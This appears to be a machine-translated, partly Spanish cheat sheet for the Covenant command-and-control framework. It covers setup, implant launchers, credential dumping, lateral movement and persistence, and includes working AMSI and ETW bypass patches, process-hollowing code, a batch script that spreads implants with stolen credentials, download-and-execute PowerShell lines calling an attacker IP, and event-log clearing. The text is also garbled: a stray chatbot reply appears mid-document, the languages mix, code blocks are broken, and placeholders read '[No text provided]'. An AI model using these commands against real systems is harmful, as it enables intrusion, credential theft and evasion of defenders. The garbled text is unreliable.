Hoja de Referencia del Framework Covenant C2¶
Descripción General¶
Covenant es un framework de comando y control (C2) basado en .NET diseñado para operaciones de red team y pruebas de penetración. Cuenta con una interfaz web para la colaboración de equipos, soporta múltiples protocolos de comunicación y proporciona capacidades extensivas de post-explotación específicamente adaptadas para entornos Windows utilizando ensamblados .NET.
⚠️ Advertencia: Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y ejercicios de red team. Asegúrese de tener la autorización adecuada antes de usar contra cualquier objetivo.
Instalación¶
Requisitos Previos¶
Instalación con Docker (Recomendado)¶
Instalación Manual¶
Instalación en Kali Linux¶
Uso Básico¶
Configuración Inicial¶
Navegación de la Interfaz Web¶
Gestión de Listeners¶
Creación de Listener HTTP¶
Creación de Listener HTTPS¶
Listener Bridge (SMB)¶
Generación e Implementación de Grunt¶
Grunt de PowerShell¶
Grunt Binario¶
Grunt de MSBuild¶
Grunt de InstallUtil¶
Gestión de Grunt¶
Interacción con Grunt¶
Gestión de Procesos¶
Operaciones de Credenciales¶
Movimiento Lateral¶
Módulos Avanzados¶
Mecanismos de Persistencia¶
Escalada de Privilegios¶
Would you like me to fill in the specific details for each section? I noticed the original text had placeholders for sections 3-20, so I've maintained that structure in the Spanish translation.```bash
Install .NET Core SDK (3.1 or later)¶
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.deb sudo apt update sudo apt install -y dotnet-sdk-6.0
Verify installation¶
dotnet --version
### Docker Installation (Recommended)
```bash
# Clone Covenant repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Docker image
docker build -t covenant .
# Run Covenant container
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant covenant
# Access web interface
# Navigate to https://localhost:7443
Manual Installation¶
# Clone repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Covenant
dotnet build
# Run Covenant
dotnet run
# Access web interface at https://localhost:7443
Kali Linux Installation¶
# Install from Kali repositories
sudo apt update
sudo apt install covenant
# Or build from source
git clone https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet run
Basic Usage¶
Initial Setup¶
# First-time setup
1. Navigate to https://localhost:7443
2. Create admin user account
3. Accept SSL certificate warnings
4. Complete initial configuration wizard
# Default credentials (change immediately)
Username: CovenantAdmin
Password: CovenantPassword
Web Interface Navigation¶
| Sección | Descripción |
|---|---|
| Dashboard | Descripción general de grunts activos y listeners |
| Listeners | Administrar listeners de comunicación |
| Grunts | Administrar hosts (agentes) comprometidos |
| Tasks | Ejecutar comandos y módulos |
| Templates | Administrar plantillas y lanzadores de grunt |
| Users | Gestión de usuarios y permisos |
| Data | Datos recopilados y descargas de archivos |
| ## Listeners Management |
Creating HTTP Listener¶
# Web Interface Steps:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTP-Listener-80
- Bind Address: 0.0.0.0
- Bind Port: 80
- Connect Address: [Your IP]
- Connect Port: 80
- Use SSL: False
# Advanced HTTP Configuration
- Profile: DefaultHttpProfile
- URLs: /en-us/index.html,/en-us/docs.html
- User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Creating HTTPS Listener¶
# HTTPS Listener Configuration:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTPS-Listener-443
- Bind Address: 0.0.0.0
- Bind Port: 443
- Connect Address: [Your IP]
- Connect Port: 443
- Use SSL: True
- SSL Certificate: [Upload or generate]
# Generate SSL Certificate
openssl req -new -x509 -keyout covenant.key -out covenant.crt -days 365 -nodes
Bridge Listener (SMB)¶
# SMB Bridge Configuration:
1. Navigate to Listeners → Create
2. Select Bridge Listener
3. Configure parameters:
- Name: SMB-Bridge
- Bind Address: 0.0.0.0
- Bind Port: 445
- Connect Address: [Target IP]
- Connect Port: 445
- Profile: SMBBridgeProfile
Grunt Generation and Deployment¶
PowerShell Grunt¶
# Generate PowerShell launcher
1. Navigate to Launchers → PowerShell
2. Configure parameters:
- Listener: HTTP-Listener-80
- Delay: 5
- Jitter: 0.1
- Connect Attempts: 5000
- Kill Date: [Future date]
# Generated PowerShell command example:
powershell -Sta -Nop -Window Hidden -EncodedCommand [Base64EncodedPayload]
# Execute on target
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[IP]/launcher.ps1')"
Binary Grunt¶
# Generate binary executable
1. Navigate to Launchers → Binary
2. Configure parameters:
- Listener: HTTPS-Listener-443
- Output Kind: ConsoleApplication
- Target Framework: net40
- Delay: 10
- Jitter: 0.2
# Download and execute on target
# Binary will be generated as .exe file
MSBuild Grunt¶
1. Navigate to Launchers → MSBuild
2. Configure listener and parameters
3. Generated MSBuild XML file:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MSBuild">
<MSBuildTask />
</Target>
<UsingTask TaskName="MSBuildTask" TaskFactory="CodeTaskFactory"
AssemblyFile="Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
// Covenant grunt code here
]]>
</Code>
</Task>
</UsingTask>
</Project>
# Execute with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
InstallUtil Grunt¶
# InstallUtil launcher
1. Navigate to Launchers → InstallUtil
2. Configure parameters
3. Execute on target:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe
Grunt Management¶
Grunt Interaction¶
# Basic grunt commands
help # Show available commands
whoami # Get current user context
hostname # Get computer name
pwd # Get current directory
ls # List directory contents
cd [directory] # Change directory
cat [file] # Read file contents
download [file] # Download file from target
upload [local] [remote] # Upload file to target
Process Management¶
# Process operations
ps # List running processes
kill [PID] # Terminate process
getpid # Get current process ID
ppid # Get parent process ID
# Process injection
inject [PID] [assembly] # Inject .NET assembly into process
shinject [PID] [shellcode] # Inject shellcode into process
Credential Operations¶
# Credential harvesting
mimikatz # Execute Mimikatz
logonpasswords # Dump logon passwords
lsadump # Dump LSA secrets
dcsync [domain] [user] # DCSync attack
golden [options] # Golden ticket creation
# Token manipulation
steal_token [PID] # Steal process token
make_token [user] [pass] # Create new token
rev2self # Revert to original token
Lateral Movement¶
# WMI execution
wmi [computer] [command] # Execute command via WMI
wmiexec [computer] [user] [pass] [command] # WMI with credentials
# PowerShell remoting
winrm [computer] [command] # Execute via WinRM
invoke-command [computer] [scriptblock] # PowerShell remoting
# Service creation
sc [computer] [service] [binary] # Create and start service
Advanced Modules¶
Persistence Mechanisms¶
# Registry persistence
persist_registry [key] [value] [payload] # Registry autorun
# Scheduled task persistence
persist_schtask [name] [trigger] [payload] # Scheduled task
# Service persistence
persist_service [name] [payload] # Windows service
# WMI persistence
persist_wmi [filter] [consumer] [payload] # WMI event subscription
Privilege Escalation¶
# UAC bypass techniques
bypassuac [method] # Various UAC bypass methods
eventvwr # Event Viewer UAC bypass
fodhelper # FodHelper UAC bypass
computerdefaults # Computer Defaults UAC bypass
# Kernel exploits
ms16-032 # Secondary Logon Handle Privilege Escalation
ms16-135 # Windows Kernel-Mode Drivers EoP
Data Collection¶
# System information
sysinfo # Detailed system information
env # Environment variables
netstat # Network connections
arp # ARP table
route # Routing table
# File system operations
find [pattern] # Search for files
tree [directory] # Directory tree
drives # List available drives
Network Operations¶
# Port scanning
portscan [target] [ports] # TCP port scan
ping [target] # ICMP ping
nslookup [hostname] # DNS lookup
# Network shares
net share # List local shares
net use # List network connections
net view [computer] # List remote shares
Team Collaboration¶
User Management¶
# Web Interface User Operations:
1. Navigate to Users section
2. Create new user accounts
3. Assign roles and permissions:
- Administrator: Full access
- User: Limited access
- Listener: Listener management only
Data Sharing¶
# File management
1. Navigate to Data → Files
2. View downloaded files from all grunts
3. Share files between team members
4. Export data for analysis
# Credential sharing
1. Navigate to Data → Credentials
2. View harvested credentials
3. Export credential database
Reporting¶
# Generate reports
1. Navigate to Data → Events
2. Filter by time range and grunt
3. Export activity logs
4. Generate executive summary
Automation and Scripting¶
Grunt Automation Script¶
// C# automation script for Covenant
using System;
using System.Threading.Tasks;
using Covenant.Models;
public class AutomationScript
\\\\{
public async Task ExecuteAutomation(Grunt grunt)
\\\\{
// Automated reconnaissance
await grunt.ExecuteTask("whoami");
await grunt.ExecuteTask("hostname");
await grunt.ExecuteTask("sysinfo");
await grunt.ExecuteTask("ps");
// Credential harvesting
if (grunt.Integrity == "High")
\\\\{
await grunt.ExecuteTask("mimikatz");
await grunt.ExecuteTask("logonpasswords");
\\\\}
// Network discovery
await grunt.ExecuteTask("netstat");
await grunt.ExecuteTask("arp");
await grunt.ExecuteTask("net view");
// Persistence
await grunt.ExecuteTask("persist_registry HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update payload.exe");
\\\\}
\\\\}
PowerShell Automation¶
# PowerShell script for automated grunt management
function Invoke-CovenantAutomation \\\\{
param(
[string]$CovenantURL = "https://localhost:7443",
[string]$Username,
[string]$Password
)
# Authenticate to Covenant API
$auth = @\\\\{
UserName = $Username
Password = $Password
\\\\}
$session = Invoke-RestMethod -Uri "$CovenantURL/api/users/login" -Method POST -Body ($auth|ConvertTo-Json) -ContentType "application/json"
# Get active grunts
$grunts = Invoke-RestMethod -Uri "$CovenantURL/api/grunts" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
foreach ($grunt in $grunts) \\\\{
if ($grunt.Status -eq "Active") \\\\{
Write-Host "Processing grunt: $($grunt.Name)"
# Execute reconnaissance commands
$commands = @("whoami", "hostname", "sysinfo", "ps")
foreach ($cmd in $commands) \\\\{
$task = @\\\\{
Type = "GruntTask"
GruntId = $grunt.Id
Command = $cmd
\\\\}
Invoke-RestMethod -Uri "$CovenantURL/api/grunttasks" -Method POST -Body ($task|ConvertTo-Json) -ContentType "application/json" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
Start-Sleep -Seconds 2
\\\\}
\\\\}
\\\\}
\\\\}
# Usage
Invoke-CovenantAutomation -Username "admin" -Password "password"
Batch Grunt Deployment¶
#!/bin/bash
# Batch grunt deployment script
COVENANT_URL="https://your-covenant-server:7443"
TARGETS_FILE="targets.txt"
# Generate PowerShell launcher
LAUNCHER=$(curl -s -k -X GET "$COVENANT_URL/api/launchers/powershell/1" -H "Authorization: Bearer $TOKEN"|jq -r '.LauncherString')
# Deploy to multiple targets
while read -r target; do
echo "[+] Deploying to $target"
# Method 1: WMI execution
impacket-wmiexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 2: PSExec
impacket-psexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 3: SMB + scheduled task
impacket-smbexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "schtasks /create /tn Update /tr \"powershell -exec bypass -c \\\"$LAUNCHER\\\"\" /sc once /st 00:00"
sleep 5
done < "$TARGETS_FILE"
Evasion Techniques¶
AMSI Bypass¶
// AMSI bypass in Covenant grunt
[System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Usage", "CA2201:DoNotRaiseReservedExceptionTypes")]
public static void BypassAMSI()
\\\\{
try
\\\\{
var amsiContext = Marshal.AllocHGlobal(9076);
var amsiSession = Marshal.AllocHGlobal(9076);
var amsiScanBuffer = Marshal.AllocHGlobal(9076);
// AMSI bypass implementation
var amsiDll = LoadLibrary("amsi.dll");
var amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");
var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
var oldProtect = VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);
VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}
ETW Bypass¶
// ETW bypass implementation
public static void BypassETW()
\\\\{
try
\\\\{
var ntdll = LoadLibrary("ntdll.dll");
var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}
Process Hollowing¶
// Process hollowing implementation
public static void ProcessHollow(string targetProcess, byte[] payload)
\\\\{
var startupInfo = new STARTUPINFO();
var processInfo = new PROCESS_INFORMATION();
// Create suspended process
CreateProcess(null, targetProcess, IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null,
ref startupInfo, out processInfo);
// Unmap original image
ZwUnmapViewOfSection(processInfo.hProcess, GetImageBase(processInfo.hProcess));
// Allocate memory and write payload
var baseAddress = VirtualAllocEx(processInfo.hProcess, GetImageBase(processInfo.hProcess),
payload.Length, AllocationType.Commit|AllocationType.Reserve,
MemoryProtection.ExecuteReadWrite);
WriteProcessMemory(processInfo.hProcess, baseAddress, payload, payload.Length, out _);
// Resume execution
ResumeThread(processInfo.hThread);
\\\\}
Integration with Other Tools¶
Metasploit Integration¶
# Use Covenant with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -o meterpreter.exe
# Upload via Covenant grunt
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
execute C:\Windows\Temp\update.exe
# Use Metasploit for post-exploitation
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 443
run
BloodHound Integration¶
# Collect BloodHound data via Covenant
# Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe
# Run BloodHound collection
execute C:\Windows\Temp\collector.exe -c All -d domain.local
# Download collected data
download C:\Windows\Temp\*BloodHound.zip
# Import into BloodHound
neo4j start
./BloodHound --no-sandbox
# Import downloaded zip file
CrackMapExec Integration¶
# Use CME for initial access, Covenant for persistence
# Initial compromise via CME
crackmapexec smb 192.168.1.0/24 -u username -p password --exec-method wmiexec -x "powershell -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/launcher.ps1')\""
# Verify Covenant grunt connection
# Use Covenant for further exploitation
Operational Security¶
Communication Security¶
# Use domain fronting
1. Configure CloudFlare or similar CDN
2. Set up domain fronting rules
3. Configure Covenant listener with fronted domain
4. Use legitimate-looking URLs and user agents
# Certificate management
# Use legitimate SSL certificates
certbot certonly --standalone -d your-domain.com
# Configure Covenant with legitimate certificate
Traffic Obfuscation¶
# Custom HTTP profiles
1. Navigate to Profiles → HTTP
2. Create custom profile mimicking legitimate traffic:
- User agents from target environment
- URLs matching legitimate applications
- Headers matching expected traffic
# Malleable C2 profiles
# Create custom communication patterns
# Mimic legitimate applications (Office 365, Google, etc.)
Anti-Forensics¶
# Event log clearing
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Timestomping
timestomp C:\Windows\Temp\payload.exe -f C:\Windows\System32\notepad.exe
# Memory cleanup
# Implement memory wiping in custom tasks
# Use process migration to avoid memory analysis
Troubleshooting¶
Common Issues¶
# Grunt not connecting
1. Check firewall rules on Covenant server
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference
# SSL certificate issues
# Generate new certificate
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Performance issues
# Increase grunt delay and jitter
# Use multiple listeners for load balancing
# Optimize task execution frequency
Debug Mode¶
# Enable debug logging
1. Navigate to Administration → Settings
2. Enable debug logging
3. Check logs in Data → Events
4. Monitor grunt communication
# Network troubleshooting
# Use Wireshark to analyze traffic
# Check for network filtering
# Verify DNS resolution
Database Issues¶
# Reset Covenant database
cd Covenant/Covenant
rm -rf Data/covenant.db
dotnet run
# Backup database
cp Data/covenant.db Data/covenant.db.backup
# Restore database
cp Data/covenant.db.backup Data/covenant.db
Mejores Prácticas¶
Planificación Operativa```bash¶
Secure Covenant deployment¶
Use strong authentication¶
Enable HTTPS with valid certificates¶
Implement network segmentation¶
Regular security updates¶
Grunt management¶
Use unique grunt names¶
Implement kill dates¶
Regular grunt rotation¶
Secure communication channels¶
**Configuración previa al compromiso**: Configurar listeners y perfiles antes del compromisobash
Maintain operation logs¶
Document all activities¶
Track compromised systems¶
Record credential harvesting¶
Generate executive reports¶
```Coordinación de equipo: Usar control de acceso basado en roles para miembros del equipohttps://github.com/cobbr/Covenant**Protocolos de comunicación**: Establecer canales de comunicación claroshttps://github.com/cobbr/Covenant/wiki**Manejo de datos**: Implementar procedimientos seguros de recolección y almacenamiento de datoshttps://posts.specterops.io/covenant-v0-1-release-cd4d7ae11151**Procedimientos de limpieza**: Planificar la eliminación de artefactos y limpieza
Consideraciones de Seguridad¶
https://www.youtube.com/watch?v=E_K0nduqeuQ[No text provided] https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/[No text provided]